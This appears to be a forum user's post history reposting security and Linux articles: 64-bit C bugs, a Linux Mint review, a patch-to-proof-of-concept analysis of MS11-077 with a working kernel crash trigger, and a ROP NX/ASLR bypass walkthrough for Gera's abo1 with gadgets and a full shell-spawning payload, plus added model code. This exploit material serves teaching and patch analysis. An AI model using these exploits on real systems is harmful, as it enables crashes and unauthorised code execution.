Everything posted by Nytro
-
I'll look in the database to see whether it can be done without too much hassle. And I don't mean reputation, that's not a problem, I mean posts.
-
A Bit Away From Kernel Execution
By ar1vr (01/12/2011), picturoku.blogspot.com
Whitepaper called A Bit Away From Kernel Execution: a 'write-what-where' kernel memory overwrite tale.
Download: http://dl.packetstormsecurity.net/papers/general/kernel-execution.pdf
-
[h=1]A Collection of Examples of 64-bit Errors in Real Programs[/h]
Contents:
Abstract
Introduction
Example 1. Buffer overflow
Example 2. Unnecessary type conversions
Example 3. Incorrect #ifdef's
Example 4. Confusion of int and int*
Example 5. Using deprecated (obsolete) functions
Example 6. Truncation of values at an implicit type conversion
Example 7. Undefined functions in C
Example 8. Remains of dinosaurs in large and old programs
Example 9. Virtual functions
Example 10. Magic constants as parameters
Example 11. Magic constants denoting size
Example 12. Stack overflow
Example 13. A function with a variable number of arguments and buffer overflow
Example 14. A function with a variable number of arguments and wrong format
Example 15. Storing integer values in double
Example 16. Address arithmetic. A + B != A - (-B)
Example 17. Address arithmetic. Signed and unsigned types.
Example 18. Address arithmetic. Overflows.
Example 19. Changing an array's type
Example 20. Wrapping a pointer in a 32-bit type
Example 21. Memsize-types in unions
Example 22. An infinity loop
Example 23. Bit operations and NOT operation
Example 24. Bit operations, offsets
Example 25. Bit operations and sign extension
Example 26. Serialization and data exchange
Example 27. Changes in type alignment
Example 28. Type alignments and why you mustn't write sizeof(x) + sizeof(y)
Example 29. Overloaded functions
Example 30. Errors in 32-bit units working in WoW64
Summary
References
[h=2]Abstract[/h]
This article is the most complete collection of examples of 64-bit errors in the C and C++ languages. The article is intended for Windows-application developers who use Visual C++, but it will be useful for other programmers as well.
[h=2]Introduction[/h]
Our company OOO "Program Verification Systems" develops a special static analyzer, Viva64, that detects 64-bit errors in the code of C/C++ applications. During this development process we constantly enlarge our collection of examples of 64-bit defects, so we decided to gather the most interesting ones in this article. Here you will find examples both taken directly from the code of real applications and composed synthetically relying on real code, since such errors are too "extended" throughout the native code. The article only demonstrates various types of 64-bit errors and does not describe methods of detecting and preventing them. If you want to know how to diagnose and fix defects in 64-bit programs, please see the following sources: Lessons on development of 64-bit C/C++ applications [1]; About size_t and ptrdiff_t [2]; 20 issues of porting C++ code on the 64-bit platform [3]; PVS-Studio Tutorial [4]; A 64-bit horse that can count [5]. You may also try the demo version of the PVS-Studio tool, which includes the Viva64 static code analyzer that detects almost all the errors described in this article. The demo version of the tool can be downloaded here: http://www.viva64.com/pvs-studio/download/. Online: http://www.viva64.com/en/a/0065/print/
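Four of the defect classes in the list above (Examples 10/11, 17, 20 and 28), reduced to small functions that return a value instead of crashing. This is an added example written for this page, not code from the article or from PVS-Studio; the struct layout and the 4-slot pointer array are mine, chosen so that each bug is visible on an LP64 build and silent on a 32-bit one.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Example 20: wrapping a pointer in a 32-bit type. The cast to unsigned int is
 * the bug; on a 64-bit build it drops the high address bits, so the round trip
 * fails. On a 32-bit build nothing is lost and the code "works". */
int pointer_survives_uint32(const void *p)
{
    unsigned int packed = (unsigned int)(uintptr_t)p;
    const void *unpacked = (const void *)(uintptr_t)packed;
    return unpacked == p;
}

/* Same check on a stack address, which on 64-bit Linux/macOS/Windows lies
 * well above 4 GiB; returns 1 only if nothing was truncated. */
int stack_pointer_survives_uint32(void)
{
    int probe = 0;
    return pointer_survives_uint32(&probe);
}

/* Example 17: signed/unsigned mix in address arithmetic. A caller meaning
 * "step back one" passes (unsigned)-1. With 32-bit addresses the wraparound
 * cancels out and base + 0xFFFFFFFF == base - 1; with 64-bit addresses the
 * sum lands 4 GiB away. Done on uintptr_t so the arithmetic is well defined. */
int unsigned_step_back_is_minus_one(uintptr_t base)
{
    unsigned int step = (unsigned int)-1;   /* intended as -1 */
    return base + step == base - 1;
}

/* Example 28: sizeof(x) + sizeof(y) is not the size of the struct holding
 * x and y. The 8-byte member forces alignment padding after 'tag' and after
 * 'len', and the amount of padding changes with the target's ABI. */
struct record { char tag; uint64_t id; uint16_t len; };
size_t record_size_naive(void) { return sizeof(char) + sizeof(uint64_t) + sizeof(uint16_t); }
size_t record_size_real(void)  { return sizeof(struct record); }

/* Examples 10/11: a magic constant 4 standing in for sizeof(void *).
 * memset clears N*4 bytes, which on a 64-bit build is only half of the
 * pointer array. Returns how many slots were left untouched (0 on 32-bit). */
size_t slots_left_dirty_after_memset(void)
{
    enum { N = 4 };
    const char *slots[N];
    size_t dirty = 0;
    for (int i = 0; i < N; i++) slots[i] = "not cleared";
    memset(slots, 0, N * 4);                /* the bug: 4 instead of sizeof(slots[0]) */
    for (int i = 0; i < N; i++) if (slots[i] != NULL) dirty++;
    return dirty;
}

int main(void)
{
    printf("stack pointer round-trips through unsigned int: %d\n", stack_pointer_survives_uint32());
    printf("base + (unsigned)-1 == base - 1: %d\n", unsigned_step_back_is_minus_one(0x1000));
    printf("struct record: naive %zu bytes, real %zu bytes\n", record_size_naive(), record_size_real());
    printf("pointer slots left dirty by memset(N*4): %zu\n", slots_left_dirty_after_memset());
    return 0;
}
```

Compile the same file with -m32 and -m64 and compare the four lines: every "works on 32-bit, breaks on 64-bit" answer is a defect that no test run on the original platform would have caught, which is why the article's examples come from shipping code.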
-
[h=1]Is Linux Mint an Ubuntu-Killer?[/h] User traffic and key design changes suggest that Mint is a serious challenger to the King of Linux. Suddenly, everyone's talking about Linux Mint. A six-year-old distribution based on Ubuntu and Debian, Linux Mint has always enjoyed considerable popularity, but, in the last month, it has started receiving dramatically more attention. This attention has two main reasons. First, pundits have been debating the meaning (if any) of the fact that Linux Mint has received over two and a half times more page views than Ubuntu on Distrowatch for the past month. Second, Linux Mint's new 12.0 release, codenamed "Lisa," features the Mint GNOME Shell Extensions (MGSE), a set of modifications that offer alternatives to the most obvious cosmetic and conceptual changes in the GNOME 3 release series. MGSE offers a desktop much like the GNOME 2 series while preserving the most useful of GNOME 3's innovations. This development is so bizarre that it could only make sense in the free and open source software community. Still, the combination of possible new popularity and MGSE is enough to start the community speculating whether Ubuntu users, discontent with the new Unity shell, are looking to Linux Mint as a replacement. At first glance, the idea is absurd. Given that MGSE modifies the GNOME 3.2 release, you might convincingly speculate that Linux Mint has provided the solution for the many who are unhappy with GNOME's current directions. But challenge Ubuntu? Canonical, Ubuntu's commercial arm, claims twenty million users, and is promoting the distribution heavily. By contrast, Linux Mint is a much smaller, non-commercial organization that appears to be less organized, and to have fewer resources to draw upon. In fact, it relies on donations and ingenuity for funding. Yet is the idea even technically possible? 
Certainly Linux Mint's team and its supporters think so, considering that for several years they have been calling Linux Mint the fourth most widely used operating system, which sounds like a deliberate challenge to Ubuntu's claim to be the third. One way or the other, a closer look seems in order.
[h=4]Linux Mint and MGSE vs. Ubuntu and Unity[/h]
Although Linux Mint offers a Debian-based edition, the majority of its releases are based on Ubuntu. Nor, so far, is the new release an exception. On the one hand, Linux Mint and Ubuntu share the same installer and boot in more or less the same time on the same machine. They share, too, the same array of GNOME-based software, down to Ubuntu 11.10's replacement of Evolution with Mozilla Thunderbird for email. Both offer fallback environments for systems without 3-D hardware acceleration, and proprietary drivers for video and wireless cards. Linux Mint 12 even introduces a new music player indicator reminiscent of Unity's. Neither includes provision for applets on the panel or application launchers on the desktop, the way that their mutual ancestor GNOME 2 did, although both do support folder and document desktop launchers. On the other hand, most of the differences are minimal. The package managers differ only in their branding, with Linux Mint's being less blaring and obtrusive, as usually happens with a community-based distribution. Admittedly, Linux Mint's system requirements list 500 megabytes of RAM compared to Ubuntu's 384. I suspect, though, that Linux Mint is simply being more realistic about how much memory is needed to do normal productivity without being completely frustrated.
[h=4]MGSE vs. Unity[/h]
So far as applications are concerned, the greatest difference is that Linux Mint defaults to the little-known DuckDuckGo search engine, whose advertising revenue Linux Mint shares. This is the closest that Linux Mint comes to matching Unity's extensive branding, but the exception is worthwhile.
DuckDuckGo offers more options, greater privacy, and noticeably different search results than Google's, and needs only image searching to be a complete replacement. However, the greatest differences between Ubuntu and Linux Mint are in the user experience. After all, Unity is a simplification of the desktop inspired by the interfaces of mobile devices, while Linux Mint is a fusion of GNOME 2 and 3. This fusion is accomplished by adding MGSE options to the Shell Extensions tab for GNOME Tweak, which an increasing number of users consider an essential addition to GNOME 3. MGSE includes extensions to restore many of the features of GNOME 2 while converting GNOME 3 innovations such as the overview mode to options rather than unavoidable necessities. When toggled on, each extension takes effect immediately, allowing you to evaluate them without delay. For many, the most important of MGSE's innovations will probably be the bottom panel, its menu and its notification tray. Together, these extensions are enough to allow users to work on a single screen, instead of constantly switching to the overview mode to open applications or switch virtual workspaces, as GNOME 3 requires. These innovations do not fully restore GNOME 2 functionality, since the panel is not customizable, but they might minimally satisfy those discontented with Unity or GNOME 3. The menu included with Linux Mint 12 is reminiscent of openSUSE's Slab or KDE's Lancelot. It is less obtrusive than both GNOME 2's classical menu and the screen overlay that replaces the menu in Unity. The notification tray is a similar combination of the traditional and the innovative, invisible until toggled by the icon on the far right of the bottom panel, and as long as the bottom panel itself. This arrangement eliminates the usual problem of some of the tray being invisible, making it an improvement over both GNOME and Unity. 
Yet what is just as important as the extensions themselves is the fact they partially restore the most important feature that Unity often removes or limits: the freedom to work the way you want. In Linux Mint, you can, for instance, work with the bottom panel menu, or go to the GNOME 3 overview to open applications. Similarly, you can work with three virtual workspaces that are part of the panel, enabling the GNOME 3 overview mode to allow the shell to manage virtual workspaces, or use both at once. Although this range of choice needs to be extended before it can match the flexibility of GNOME 2, it is far more than anything provided by Unity, which generally imposes a single way to work on all users, regardless of their preferences. [h=4]Going Down the Road[/h] For those who already use Linux, the trend of Linux Mint is promising. MGSE in particular suggests that Linux Mint is in tune with the existing user base, a group that seems to value the ability to work in their preferred style more than any other factor. At the same time, I suspect that many existing users may feel that Linux Mint does not go far enough in its tendencies. While many will find it an improvement over Ubuntu with Unity, the improvement may not be great enough to be worth the effort of switching distributions. I wonder, too, whether the same qualities that might endear Linux Mint to existing users -- or, at least, make it the lesser of several evils -- will appeal equally to the new users that Unity seems calculated to attract. So far as the Distrowatch figures have meaning, they may reflect only the curiosity of existing users. For now, the most that can be said is that Linux Mint seems to be heading for a destination of which many existing users approve. Unfortunately, in the current release, it has moved part ways down the road but still has a ways to travel. To me, the important question is whether it can arrive before community interest shifts. 
Also (the question nobody is asking in the focus on Ubuntu) will GNOME or other distributions seize on MGSE as a graceful way of recovering from the embarrassing reception of GNOME 3?
Source: Is Linux Mint an Ubuntu-Killer? - Datamation
-
Database Browser Portable 4.0.0.2 (multi-protocol database client) Released
Submitted by John T. Haller on December 2, 2011 - 1:22pm
Database Browser Portable 4.0.0.2 has been released. Database Browser Portable is an easy-to-use tool that allows you to connect to any database (Oracle, MS-SQL, MySQL, Firebird, etc.) and browse or modify data, run SQL scripts, and export and print data. This release adds support for Unicode in MySQL, PostgreSQL, SQLite and Interbase connections and encrypts connection details. It's packaged in PortableApps.com Format so it can easily integrate with the PortableApps.com Platform. Database Browser Portable is freeware for both commercial and personal use. This application is packaged for portable use by the publisher, DB Software Laboratory. Update automatically or install from the app store in the PortableApps.com Platform.
Features:
Works directly with Oracle, MS SQL Server, ODBC, MySQL, PostgreSQL, SQLite, OLE DB, Interbase and Firebird
Support for ODBC connection strings
Unlimited number of connections
One-click switching from one connection to another
One-click table browsing
Data browsing
Data export into CSV, Excel and HTML files
Execution history
SQL Builder with a wide range of supported databases
Execution log
Incremental table search
Download: http://portableapps.com/bouncer?t=http%3A%2F%2Fwww.dbsoftlab.com%2Fdmdocuments%2FDatabaseBrowserPortable_4.0.0.2_English.paf.exe
Source: Database Browser Portable 4.0.0.2 (multi-protocol database client) Released | PortableApps.com - Portable software for USB, portable and cloud drives
-
MS11-077: From Patch to Proof-of-Concept
Posted by Bharat Jogi on Dec 2, 2011 8:06:08 AM
[h=3]Abstract:[/h]
In the October 2011 Patch Tuesday, Microsoft released update MS11-077 to fix a null pointer dereference vulnerability (CVE-2011-1985). In this paper, we reverse engineer the patch for MS11-077 (CVE-2011-1985) to get a better understanding of the vulnerability it fixes.
[h=3]Sample:[/h]
Unpatched file: win32k.sys (version 5.1.2600.6119)
Patched file: win32k.sys (version 5.1.2600.6149)
[h=3]Patch Analysis:[/h]
Using a binary diff, we can see the changes that were made to the vulnerable file win32k.sys. Figure 1 shows the TurboDiff results.
Figure 1: TurboDiff results
As Figure 1 shows, most of the functions are identical, but a couple of functions look 'suspicious' and some others are 'changed'. The large number of changes is not a surprise, because Microsoft fixed four different vulnerabilities with this patch. Taking a closer look at all the changed functions, you will see that the changes made to NtUserfnINLBOXSTRING, NtUserfnSENTDDEMSG and NtUserfnINCBOXSTRING are all the same. Figure 2 shows the change.
Figure 2: Binary diff for function NtUserfnINLBOXSTRING(x,x,x,x,x)
Looking at the binary difference, it is clear that the patch checks whether arg_0 (the first argument passed to the function) is 0xFFFFFFFF; if it is, it calls _UserSetLastError() with 0x578 and returns from the function. This gives us two pointers for triggering the vulnerability. The first is that arg_0 has to be 0xFFFFFFFF. The second is that the patched function bails out setting the system error code to 0x578. This is the system error code for ERROR_INVALID_WINDOW_HANDLE, which hints that the argument is of type HWND.
[h=3]Quest:[/h]
Everything so far is pretty simple and it looks easy to trigger this vulnerability. However, the real challenge is finding a user-mode function that will call the vulnerable function. It turns out this isn't very straightforward, and we need to understand the Windows GUI subsystem.
[h=3]Win32 GDI Subsystem:[/h]
Figure 3: Win32 interfaces and their relation to the kernel components
The GDI (Graphics Device Interface) APIs are implemented in GDI32.DLL and include all the low-level graphics services such as drawing lines, displaying BMPs, etc. The GDI APIs make system calls into win32k.sys to implement most APIs. The User APIs are implemented in the USER32.DLL module and include all higher-level GUI-related services such as window management, menus, dialog boxes, user controls, etc. USER relies heavily on GDI to do its work. One of the most important means of communication in Windows is messages. Windows-based applications are event-driven and act upon messages sent to them. The way you program in Windows is by responding to events, and these events are called messages. Messages can signal many events, caused by the user, the operating system, or another program. Each window, owned by a thread, has a window procedure (function) for processing input messages and dispatching them to the operating system. When a thread first accesses any of the user interface or GDI system calls (handled by win32k.sys), the kernel creates a THREADINFO structure which holds three message queues used to process input: the input queue, the post queue, and the send queue. The input queue is primarily used for mouse and keyboard messages, while the send and post queues are used for synchronous (send) and asynchronous (post) window messages respectively. Asynchronous messages are used in one-way communication between window threads and are typically used to notify a window to perform a specific task. Asynchronous messages are handled by the PostMessage APIs and are sent to the post queue of the receiving thread. The sender does not wait for the processing to complete in the receiving thread and thus returns immediately. Synchronous messages differ from asynchronous messages in that the sender typically waits for a response to be provided or a timeout to occur before continuing execution. Thus, they require mechanisms to ensure that the threads are properly synchronized and in the expected state. Synchronous messages use the SendMessage APIs, which in turn direct execution to the NtUserMessageCall system call in win32k.sys. This information is enough for us to take our analysis further.
[h=3]Hitting the vulnerable function:[/h]
As described above, the message mechanism plays an integral role in the user interface component of the Windows operating system. There are many different types of message codes, and those less than 0x400 are reserved by the operating system. Depending on the message code, NtUserMessageCall() calls a particular function to handle the message. Let's take a closer look at how NtUserMessageCall calls the appropriate function for each message type.
Figure 4: Assembly code for NtUserMessageCall()
As seen in the figure, the function first checks whether the Msg code (held in EAX) is less than 0x400, i.e. whether it is a system message code. Each message code is an index into the win32k!MessageTable byte array. The byte fetched there is then ANDed with 0x3F, since its low 6 bits determine the function that will handle the message code. _gapfnMessageCall is a function table that stores the addresses of all the functions that can handle the different messages. Figure 5 shows what the table looks like.
Figure 5: _gapfnMessageCall function table
Thus, once we know the index of a vulnerable function in _gapfnMessageCall, we can compute which message codes reach it. The indexes of our vulnerable functions are 29 (0x1D), 27 (0x1B) and 43 (0x2B) for NtUserfnINLBOXSTRING(), NtUserfnINCBOXSTRING() and NtUserfnSENTDDEMSG() respectively. The following pseudo-code computes the Msg codes that hit the vulnerable functions:

for i in range [0x00, 0x400):
    if MessageTable[i] & 0x3F == 0x1D: Hit! (NtUserfnINLBOXSTRING)
    if MessageTable[i] & 0x3F == 0x1B: Hit! (NtUserfnINCBOXSTRING)
    if MessageTable[i] & 0x3F == 0x2B: Hit! (NtUserfnSENTDDEMSG)

[h=3]Proof of Concept:[/h]

#include <windows.h>

int main(void)
{
    SendNotifyMessageA((HWND)0xFFFF, 0x143, 0, 0);
    return 0;
}

OR

#include <windows.h>

int main(void)
{
    /* SendMessageCallbackA takes a callback and a context argument as well;
       the original listing omitted them, NULL and 0 are passed here so it compiles. */
    SendMessageCallbackA((HWND)0xFFFF, 0x143, 0, 0, NULL, 0);
    return 0;
}

Other possible Msg codes for hitting the vulnerable functions are:
0x143, 0x14A, 0x14C, 0x14D, 0x158, 0x180, 0x181, 0x18C, 0x18F, 0x1A2, 0x1AA, 0x1AB, 0x1AC, 0x1AD, 0x3E2, 0x3E3, 0x3E5, 0x3E6, 0x3E7, 0x3E8
[h=3]Conclusion:[/h]
As we've seen above, it is pretty easy to trigger this vulnerability. We recommend that our customers scan their environment for QID 90746 and apply this security update as soon as possible.
[h=3]References:[/h]
http://www.codeproject.com/KB/dialog/messagehandling.aspx
http://c0decstuff.blogspot.com/2011/03/desynchronization-issues-in-windows.html
Reversing: Secrets of Reverse Engineering - Wikipedia, the free encyclopedia
http://doxygen.reactos.org/d3/d69/include_2reactos_2win32k_2ntuser_8h_a14fd6fae7992b1218ed08fbaec9396b8.html
http://uninformed.org/index.cgi?v=10&a=2#MSFT:2
Source: https://community.qualys.com/blogs/securitylabs/2011/12/02/ms11-077-from-patch-to-proof-of-concept
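The dispatch path the post describes (message code below 0x400, MessageTable byte, low 6 bits, _gapfnMessageCall slot) together with the vulnerable handler shape and the check the patch adds, as an added model written for this page; it is not Qualys code and not win32k.sys. The fnIDs 0x1B/0x1D/0x2B and the error code 0x578 come from the post; the MessageTable contents are constructed (a few codes from the post's list assigned to fnIDs by me), the handle lookup is a stand-in, and a NULL dereference is reported as a return value instead of a crash.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define WM_USER                      0x400        /* codes below this are system messages */
#define ERROR_INVALID_WINDOW_HANDLE  0x578        /* the error code the patch sets */
#define INVALID_HWND                 0xFFFFFFFFu  /* the arg_0 value the patch rejects */

/* fnIDs from the post: the low 6 bits of a MessageTable entry */
enum { FNID_INCBOXSTRING = 0x1B, FNID_INLBOXSTRING = 0x1D, FNID_SENTDDEMSG = 0x2B, FNID_COUNT = 0x40 };

/* outcomes of a modelled call (the real driver crashes on CALL_NULL_DEREF) */
enum { CALL_OK = 0, CALL_NULL_DEREF = -1, CALL_NOT_SYSTEM_MSG = -2, CALL_UNHANDLED = -3 };

typedef int (*msg_fn)(uint32_t hwnd, uint32_t msg, uint32_t wparam, uint32_t lparam);

static uint32_t g_last_error;
uint32_t last_error(void) { return g_last_error; }

/* Stand-in for handle validation: the bogus handle resolves to no object. */
struct wnd { uint32_t style; };
static struct wnd g_window = { 0x10000000u };
static struct wnd *lookup_hwnd(uint32_t hwnd) { return hwnd == INVALID_HWND ? NULL : &g_window; }

/* Unpatched handler shape: the lookup result is used without a NULL check. */
static int handler_unpatched(uint32_t hwnd, uint32_t msg, uint32_t wp, uint32_t lp)
{
    struct wnd *w = lookup_hwnd(hwnd);
    volatile uint32_t style;
    (void)msg; (void)wp; (void)lp;
    if (w == NULL) return CALL_NULL_DEREF;   /* the spot where win32k.sys touches a NULL pointer */
    style = w->style;
    (void)style;
    return CALL_OK;
}

/* Patched handler shape: the check the binary diff shows at function entry. */
static int handler_patched(uint32_t hwnd, uint32_t msg, uint32_t wp, uint32_t lp)
{
    if (hwnd == INVALID_HWND) {
        g_last_error = ERROR_INVALID_WINDOW_HANDLE;   /* _UserSetLastError(0x578) */
        return CALL_OK;
    }
    return handler_unpatched(hwnd, msg, wp, lp);
}

/* NtUserMessageCall as the post describes it: msg < 0x400, then
 * MessageTable[msg] & 0x3F indexes _gapfnMessageCall. */
int message_call(const uint8_t *message_table, msg_fn const *fn_table,
                 uint32_t hwnd, uint32_t msg, uint32_t wp, uint32_t lp)
{
    if (msg >= WM_USER) return CALL_NOT_SYSTEM_MSG;
    unsigned fnid = message_table[msg] & 0x3F;
    if (fn_table[fnid] == NULL) return CALL_UNHANDLED;
    return fn_table[fnid](hwnd, msg, wp, lp);
}

/* The post's pseudo-code made concrete: every system message code routed to fnid. */
size_t find_msg_codes(const uint8_t *message_table, unsigned fnid, uint32_t *out, size_t cap)
{
    size_t n = 0;
    for (uint32_t msg = 0; msg < WM_USER; msg++)
        if ((message_table[msg] & 0x3F) == fnid && n < cap) out[n++] = msg;
    return n;
}

/* Constructed table: codes taken from the post's hit list, assigned to fnIDs by me;
 * 0x18C carries an upper flag bit to show why the & 0x3F mask matters. */
static uint8_t g_message_table[WM_USER];
static void build_demo_table(void)
{
    for (unsigned i = 0; i < WM_USER; i++) g_message_table[i] = 0;
    g_message_table[0x143] = FNID_INCBOXSTRING;
    g_message_table[0x180] = FNID_INLBOXSTRING;
    g_message_table[0x18C] = 0x40 | FNID_INLBOXSTRING;
    g_message_table[0x3E8] = FNID_SENTDDEMSG;
}

size_t count_demo_codes(unsigned fnid)
{
    uint32_t codes[WM_USER];
    build_demo_table();
    return find_msg_codes(g_message_table, fnid, codes, WM_USER);
}

/* One SendMessage-style call with the bogus handle, against unpatched or patched handlers. */
int run_demo(int patched, uint32_t msg)
{
    msg_fn fn_table[FNID_COUNT] = { 0 };
    msg_fn h = patched ? handler_patched : handler_unpatched;
    fn_table[FNID_INCBOXSTRING] = fn_table[FNID_INLBOXSTRING] = fn_table[FNID_SENTDDEMSG] = h;
    build_demo_table();
    return message_call(g_message_table, fn_table, INVALID_HWND, msg, 0, 0);
}

int main(void)
{
    printf("unpatched, msg 0x143, hwnd -1: %d (-1 = NULL deref)\n", run_demo(0, 0x143));
    printf("patched,   msg 0x143, hwnd -1: %d, last error 0x%x\n", run_demo(1, 0x143), last_error());
    printf("codes routed to fnid 0x1D in the demo table: %zu\n", count_demo_codes(FNID_INLBOXSTRING));
    return 0;
}
```

The point of the mask in find_msg_codes is that a table entry can carry flag bits above the fnID, so scanning for equality with 0x1D would miss 0x18C in this table; the driver masks before indexing, so the scan must too.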
-
Gera's Insecure Programming Advance Buffer Overflow #1 (ROP NX/ASLR Bypass)
Posted on November 27, 2011 by lixor_
After my last post, I decided to go straight into the Advance Buffer Overflow (ABO) section and practice more ROP. The first ABO exercise was a straight-forward buffer overflow.
ABO #1 source code:

/* abo1.c
 *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced... */

#include <string.h>   /* not in Gera's original; added so strcpy() has a prototype */

int main(int argv,char **argc) {
    char buf[256];
    strcpy(buf,argc[1]);
}

The environment, as usual, was Debian 2.6.32 with NX and ASLR enabled. The binary can be found here.

lixor@debian:~$ uname -a
Linux debian 2.6.32-5-686-bigmem #1 SMP Thu Nov 3 05:12:00 UTC 2011 i686 GNU/Linux

The technique that will be used throughout this post is known as "GOT dereferencing." For the interested reader, you can read about the technique here. The return address can be found at 268 bytes.

lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(ruby -e 'print "A"*256 +"BBBBCCCCDDDDEEEE"')
Segmentation fault (core dumped)
lixor@debian:~/InsecureProgramming/abo1$ gdb -q -nx -batch abo1 core
warning: Can't read pathname for load map: Input/output error.
Core was generated by `./abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x45454545 in ?? ()
lixor@debian:~/InsecureProgramming/abo1$

I needed two functions for this technique: the targeted function and the pivot function. I used the VNSECURITY ROPEME tool to search for gadgets. The binary was rather small, so finding certain gadgets was difficult, but I was able to find some useful ones. The entire gadget list can be found here.

(1) 0x8048392L: pop ebx ; pop ebp ;;
(2) 0x804838bL: xchg ebp eax ; add al 0x8 ; add [ebx+0x5d5b04c4] eax ;;
(1) 0x8048392L: pop ebx ; pop ebp ;;
(3) 0x804847eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx ; pop ebp ;;
(4) 0x80483bfL: call eax ; leave ;;

I needed to perform some dummy calculations for (2) and (3). Gadget (2) accesses a memory location, so EBX must be a valid memory location minus 0x5d5b04c4 (to obtain the intended address). A valid location can be found in the relocation table. I chose 0x080495a8 (__gmon_start__) for the first EBX in (2) and 0x080495b0 (strcpy) for the second one in (3).

lixor@debian:~/InsecureProgramming/abo1$ readelf -r abo1
...
080495a8  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
...
080495b0  00000307 R_386_JUMP_SLOT   00000000   strcpy

The calculations for (2) and (3) are simple, as shown:

#first dummy value for ebx
lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495a8-0x5d5b04c4 '
aaa990e4
#real value
lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x080495b0 + 0xb8a0008 '
138e95b8

Next, I performed the calculations for the EAX register. EAX will hold the offset between system() and strcpy() minus 8, to account for the add al,0x8 in (2).

lixor@debian:~/InsecureProgramming/abo1$ objdump -T /lib/i686/cmov/libc.so.6 | egrep ' strcpy$|system$'
00072ea0 g    DF .text  00000023  GLIBC_2.0   strcpy
00039180 g    DF .text  0000007d  GLIBC_PRIVATE __libc_system
00039180 w    DF .text  0000007d  GLIBC_2.0   system
lixor@debian:~/InsecureProgramming/abo1$ perl -e 'printf "%x\n", 0x00039180-0x00072ea0 - 0x8'
fffc62d8

Here is a general summary of the important values:
1st dummy ebx = 0xaaa990e4
eax = 0xfffc62d8
ebx = 0x138e95b8

The last step was to find a string for system(). A safe option (like in my last post) was to use the string "GNU" from .note.gnu.build-id at 0x08048154.

lixor@debian:~/InsecureProgramming/abo1$ readelf -x .note.gnu.build-id abo1
Hex dump of section '.note.gnu.build-id':
  0x08048148 04000000 14000000 03000000 474e5500 ............GNU.
  0x08048158 abf92e7c f0e973e4 86c3ba84 9d7a7142 ...|..s......zqB
  0x08048168 7122ec44                            q".D

With that, the exercise was completed:

lixor@debian:~/InsecureProgramming/abo1$ ln -s /bin/sh GNU
lixor@debian:~/InsecureProgramming/abo1$ export PATH=.:$PATH
lixor@debian:~/InsecureProgramming/abo1$ ./abo1 $(perl -e 'print "A"x268 ."\x92\x83\x04\x08\xe4\x90\xa9\xaa\xd8\x62\xfc\xff\x8b\x83\x04\x08\x92\x83\x04\x08\xb8\x95\x8e\x13AAAA\x7e\x84\x04\x08MOVEPOPPPOPP\xbf\x83\x04\x08\x54\x81\x04\x08"')
$ whoami
lixor
$

Source: http://isisblogs.poly.edu/2011/11/27/geras-insecure-programming-advance-buffer-overflow-1-rop-nxaslr-bypass/
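The chain above depends on three operands that only work because 32-bit register arithmetic wraps, and on the `add al,8` touching only the low byte. This added example, written for this page and not part of lixor_'s post, recomputes those operands from the addresses the post quotes, dry-runs gadgets (1) to (3) against a pretend GOT to confirm EAX ends up at system(), and assembles the argv[1] buffer byte for byte. The libc load base used in the dry run (0xb7e00000) is made up; ASLR picks the real one, which is exactly why the chain reads it from the GOT instead of hard-coding it.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Addresses and offsets quoted in the post (abo1 on Debian i686) */
#define GOT_GMON_START  0x080495a8u   /* R_386_JUMP_SLOT __gmon_start__: dummy write target */
#define GOT_STRCPY      0x080495b0u   /* R_386_JUMP_SLOT strcpy: read source */
#define LIBC_STRCPY     0x00072ea0u   /* objdump -T offsets inside libc.so.6 */
#define LIBC_SYSTEM     0x00039180u
#define STR_GNU         0x08048154u   /* "GNU" inside .note.gnu.build-id */
#define G1_POP_EBX_EBP  0x08048392u   /* pop ebx ; pop ebp ; ret */
#define G2_XCHG_ADD     0x0804838bu   /* xchg ebp,eax ; add al,8 ; add [ebx+0x5d5b04c4],eax ; ret */
#define G3_ADD_EAX_MEM  0x0804847eu   /* add eax,[ebx-0xb8a0008] ; add esp,4 ; pop ebx ; pop ebp ; ret */
#define G4_CALL_EAX     0x080483bfu   /* call eax ; leave */
#define G2_DISP         0x5d5b04c4u
#define G3_DISP         0x0b8a0008u
#define RET_OFFSET      268

struct chain_values { uint32_t ebx_dummy, eax_seed, ebx_real; };

/* The three computed operands; uint32_t arithmetic wraps mod 2^32 like the CPU's does. */
struct chain_values compute_chain_values(void)
{
    struct chain_values v;
    v.ebx_dummy = GOT_GMON_START - G2_DISP;      /* ebx + 0x5d5b04c4 must land on a writable slot */
    v.eax_seed  = LIBC_SYSTEM - LIBC_STRCPY - 8; /* system - strcpy, less the 8 that add al,8 puts back */
    v.ebx_real  = GOT_STRCPY + G3_DISP;          /* ebx - 0xb8a0008 must read strcpy's resolved address */
    return v;
}

/* Sanity check for the dummy write: it must target the __gmon_start__ slot and nothing else. */
int dummy_write_hits_gmon_slot(void)
{
    return compute_chain_values().ebx_dummy + G2_DISP == GOT_GMON_START;
}

/* Dry run of gadgets (1)-(3) against a pretend GOT, for a given runtime address
 * of strcpy. Returns the EAX that gadget (4) would call. */
uint32_t simulate_eax(uint32_t strcpy_runtime)
{
    const struct chain_values v = compute_chain_values();
    uint32_t got_strcpy = strcpy_runtime;               /* resolved by the strcpy() that overflowed us */
    uint32_t ebx = v.ebx_dummy, ebp = v.eax_seed, eax;  /* gadget (1) */
    eax = ebp;                                          /* gadget (2): xchg ebp,eax */
    eax = (eax & 0xFFFFFF00u) | ((eax + 8) & 0xFFu);     /* add al,8: byte-wide, no carry into the rest */
    /* add [ebx+disp],eax lands on GOT_GMON_START, which nothing reads afterwards */
    ebx = v.ebx_real;                                   /* gadget (1) again; ebp receives "AAAA" */
    if (ebx - G3_DISP == GOT_STRCPY) eax += got_strcpy; /* gadget (3): add eax,[ebx-disp] */
    (void)ebp;
    return eax;
}

static size_t put32(uint8_t *out, size_t pos, uint32_t v)
{
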